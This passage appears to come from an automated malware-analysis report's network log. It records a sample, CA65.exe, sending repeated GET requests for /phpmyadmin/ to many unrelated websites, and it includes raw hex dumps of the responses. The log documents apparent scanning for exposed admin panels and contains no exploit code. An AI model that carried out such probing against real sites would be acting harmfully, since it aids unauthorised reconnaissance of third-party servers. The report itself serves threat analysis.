2023-12-22 20:12:39 UTC	1369	IN	Data Raw: 8b ec ff 75 0c 6a 00 ff 75 08 68 a4 24 40 00 e8 92 ff ff ff 83 c4 10 5d c3 8b ff 55 8b ec ff 75 10 ff 75 0c ff 75 08 68 a4 24 40 00 e8 75 ff ff ff 83 c4 10 5d c3 8b ff 55 8b ec ff 75 0c 6a 00 ff 75 08 68 12 e9 40 00 e8 59 ff ff ff 83 c4 10 5d c3 8b ff 55 8b ec ff 75 10 ff 75 0c ff 75 08 68 12 e9 40 00 e8 3c ff ff ff 83 c4 10 5d c3 8b ff 55 8b ec 83 ec 20 53 33 db 39 5d 14 75 20 e8 a1 fd ff ff 53 53 53 53 53 c7 00 16 00 00 00 e8 0e fd ff ff 83 c4 14 83 c8 ff e9 99 00 00 00 56 8b 75 0c 57 8b 7d 10 3b fb 74 21 3b f3 75 1d e8 71 fd ff ff 53 53 53 53 53 c7 00 16 00 00 00 e8 de fc ff ff 83 c4 14 83 c8 ff eb 6a b8 ff ff ff 7f 89 45 e4 3b f8 77 03 89 7d e4 ff 75 1c 8d 45 e0 ff 75 18 c7 45 ec 42 00 00 00 ff 75 14 89 75 e8 50 89 75 e0 ff 55 08 83 c4 10 89 45 14 3b Data Ascii: ujuh$@]Uuuuh$@u]Uujuh@Y]Uuuuh@<]U S39]u SSSSSVuW};t!;uqSSSSSjE;w}uEuEBuuPuUE;
2023-12-22 20:12:39 UTC	1369	IN	Data Raw: 83 e7 1f c1 e7 06 8b 04 07 83 f8 ff 74 08 3b c6 74 04 85 c0 75 02 89 31 83 c1 20 42 81 f9 f8 41 82 00 7c ce 5f 33 c0 5e c3 e8 a6 e0 00 00 80 3d 48 63 82 00 00 74 05 e8 1c de 00 00 ff 35 e4 87 82 00 e8 ed 5b 00 00 59 c3 8b ff 55 8b ec 56 8b 75 08 b8 88 41 82 00 3b f0 72 22 81 fe e8 43 82 00 77 1a 8b ce 2b c8 c1 f9 05 83 c1 10 51 e8 69 6a 00 00 81 4e 0c 00 80 00 00 59 eb 0a 83 c6 20 56 ff 15 74 00 82 00 5e 5d c3 8b ff 55 8b ec 8b 45 08 83 f8 14 7d 16 83 c0 10 50 e8 3c 6a 00 00 8b 45 0c 81 48 0c 00 80 00 00 59 5d c3 8b 45 0c 83 c0 20 50 ff 15 74 00 82 00 5d c3 8b ff 55 8b ec 8b 45 08 b9 88 41 82 00 3b c1 72 1f 3d e8 43 82 00 77 18 81 60 0c ff 7f ff ff 2b c1 c1 f8 05 83 c0 10 50 e8 01 69 00 00 59 5d c3 83 c0 20 50 ff 15 0c 01 82 00 5d c3 8b ff 55 8b ec 8b 4d Data Ascii: t;tu1 BA\|_3^=Hct5[YUVuA;r"Cw+QijNY Vt^]UE}P<jEHY]E Pt]UEA;r=Cw`+PiY] P]UM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	52270	34.206.39.153	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:50 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: aldine.org.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:50 UTC	588	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:14:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin Location: http://www.org.com?not_found=aldine.org.com Cache-Control: no-cache X-Request-Id: 6409d104-53f2-4cff-80d7-579bdede1f84 X-Runtime: 0.001000 Set-Cookie: SERVERID=vpc4\|ZYXxF\|ZYXxF; path=/
2023-12-22 20:14:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	53849	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:50 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_GEnBzdvcWKhDU868mmO49H7BiHA8bCvAsPg5KvpLBVs+9wEBB7dt8RKV+6YtbupljEymJQuoWgouUsuAYll8vQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:51 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	54421	192.185.183.254	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:50 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: easlab.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	263	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 30 Sep 2022 11:47:19 GMT Accept-Ranges: bytes Content-Length: 11816 Vary: Accept-Encoding Content-Type: text/html
2023-12-22 20:14:51 UTC	7929	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Typ
2023-12-22 20:14:51 UTC	3887	IN	Data Raw: 69 74 65 43 6f 6e 64 20 25 7b 52 45 51 55 45 53 54 5f 46 49 4c 45 4e 41 4d 45 7d 20 21 2d 64 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 52 65 77 72 69 74 65 52 75 6c 65 20 2e 20 2f 69 6e 64 65 78 2e 70 68 70 20 5b 4c 5d 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 26 6c 74 3b 2f 49 66 4d 6f 64 75 6c 65 26 67 74 3b 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 23 20 45 6e 64 20 57 6f 72 64 50 72 65 73 73 0a 09 09 09 09 09 09 09 09 09 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 72 20 62 6c 6f 67 20 69 73 20 73 68 6f 77 69 6e 67 20 74 68 65 20 77 72 6f 6e 67 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 6e 20 6c 69 6e 6b 73 2c 20 72 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 61 6e 6f 74 68 65 Data Ascii: iteCond %{REQUEST_FILENAME} !-d<br>RewriteRule . /index.php [L]<br></IfModule><br># End WordPress</p></div><p>If your blog is showing the wrong domain name in links, redirecting to anothe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	53819	185.230.63.107	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:50 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: pmcsystem.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	782	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=utf-8 Connection: close x-wix-request-id: 1703276091.0331710180937115463 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLuKm1ZjblSPwIJojBzuX7KYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalk/nmsEX1RihcfYTAuWmPIVrvQThthCJtZ4MM8WOOvl7eYd1852DtYyyQdHC9ligiA==,2UNV7KOq4oGjA5+PKsX47HWShCS4DzdxDWECJm/3qSgfbJaKSXYQ/lskq2jK6SGP,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,q4Lmhk3LuY9WzSLOm0WLKV0xpIl3PUTIhAv9hKeMcO0=,WDMzHiyOL7uW518fW2Byr06xHPCK537k6EVzpMSs4DH99KqBTwExals4cOXLszKDtqhJvaMlJuqJm4JppQlSfA== Vary: Accept-Encoding X-Content-Type-Options: nosniff Transfer-Encoding: chunked
2023-12-22 20:14:51 UTC	404	IN	Data Raw: 62 64 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 Data Ascii: bd3 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" c
2023-12-22 20:14:51 UTC	2372	IN	Data Raw: 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 Data Ascii: device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace
2023-12-22 20:14:51 UTC	263	IN	Data Raw: 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: > <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	53844	104.21.69.169	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:50 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: aikya.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	729	IN	HTTP/1.1 526 Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2FaeH7m8YqrXWOUUIyYQ3XePyXdmAfCMNQG3vABwQLUqN%2FOjQjD4eLJ%2Boq5XN30rTVjhLdlGmvRIFPipH7GFyTsFHk4smX44yMcXkcznbV9cUT1y7CeIisDEUz8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 839b08912dfb8da8-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:51 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 36 Data Ascii: error code: 526

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	53818	91.132.253.137	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: flandria-loisirs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	438	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Cache-Control: no-cache, private X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=300 Upgrade: h2,h2c Connection: Upgrade, close X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline'; Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:51 UTC	7754	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 69 6e 74 72 6f 75 76 61 62 6c 65 20 2d 20 46 6c 61 6e 64 72 69 61 20 4c 6f 69 73 69 72 73 20 2d 20 76 65 6e 74 65 20 64 65 20 6d 6f 62 69 6c 2d 68 6f 6d 65 73 20 6e 65 75 66 20 65 74 20 64 27 6f 63 63 61 73 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 3c 6d Data Ascii: 2000<!DOCTYPE html><html lang="fr" prefix="og: http://ogp.me/ns#"> <head> <title>Page introuvable - Flandria Loisirs - vente de mobil-homes neuf et d'occasion</title><meta http-equiv="content-type" content="text/html; charset=UTF-8"/><m
2023-12-22 20:14:51 UTC	444	IN	Data Raw: 6e 61 76 62 61 72 2d 63 6f 6e 74 61 69 6e 65 72 20 75 6b 2d 6e 61 76 62 61 72 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 6f 2d 6d 65 6e 75 2d 64 65 73 6b 74 6f 70 20 22 20 75 6b 2d 6e 61 76 62 61 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 6b 2d 77 69 64 74 68 2d 65 78 70 61 6e 64 20 75 6b 2d 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 75 6b 2d 6e 61 76 62 61 72 2d 6e 61 76 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 22 3e 3c 73 70 61 6e 20 75 6b 2d 69 63 6f 6e 3d 22 69 63 6f 6e 3a 20 68 6f 6d 65 3b 20 72 61 74 69 6f Data Ascii: navbar-container uk-navbar-transparent o-menu-desktop " uk-navbar> <div class="uk-width-expand uk-navbar-left"> <ul class="uk-navbar-nav"><li><a href="https://www.flandria-loisirs.com/"><span uk-icon="icon: home; ratio
2023-12-22 20:14:51 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:51 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 6d 6f 62 69 6c 2d 68 6f 6d 65 73 2d 6e 65 75 66 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 63 6c 61 73 73 3d 22 22 3e 4d 6f 62 69 6c 20 68 6f 6d 65 73 20 6e 65 75 66 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 31 39 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 6d 6f 62 69 6c 2d 68 6f 6d 65 73 2d 6f 63 63 61 73 69 6f 6e 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 63 6c 61 73 73 3d 22 22 3e 4d 6f 62 69 6c 20 68 6f 6d 65 73 20 64 26 23 30 33 39 3b 6f 63 63 61 73 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 Data Ascii: 2000//www.flandria-loisirs.com/mobil-homes-neuf" target="_self" class="">Mobil homes neufs</a></li><li class="nav-item-194"><a href="https://www.flandria-loisirs.com/mobil-homes-occasion" target="_self" class="">Mobil homes d'occasion</a></li><li c
2023-12-22 20:14:51 UTC	6	IN	Data Raw: 20 20 20 20 20 20 Data Ascii:
2023-12-22 20:14:51 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:51 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 6d 61 69 6e 3e 0a 0a 0a 3c 66 6f 6f 74 65 72 20 63 6c 61 73 73 3d 22 6f 2d 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 2d 66 6f 6f 74 65 72 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 6b 2d 70 61 64 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 6b 2d 74 65 78 74 2d 63 65 6e 74 65 72 20 6f 2d 66 6f 6f 74 65 72 2d 6d 61 69 6e 5f 5f 6c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 Data Ascii: 2000 </article> </div></main><footer class="o-footer" role="contentinfo" id="footer"> <div class="o-footer-main"> <div class="uk-padding"> <div class="uk-text-center o-footer-main__logo"> <a href="h
2023-12-22 20:14:51 UTC	6	IN	Data Raw: 20 20 20 20 20 20 Data Ascii:
2023-12-22 20:14:51 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:51 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 2000 <li>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	52263	173.201.182.85	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	178	OUT	GET /phpmyadmin/ HTTP/1.1 Host: grassgraphics.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	176	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Content-Length: 671 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:14:51 UTC	671	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	54327	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: davescheirer.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
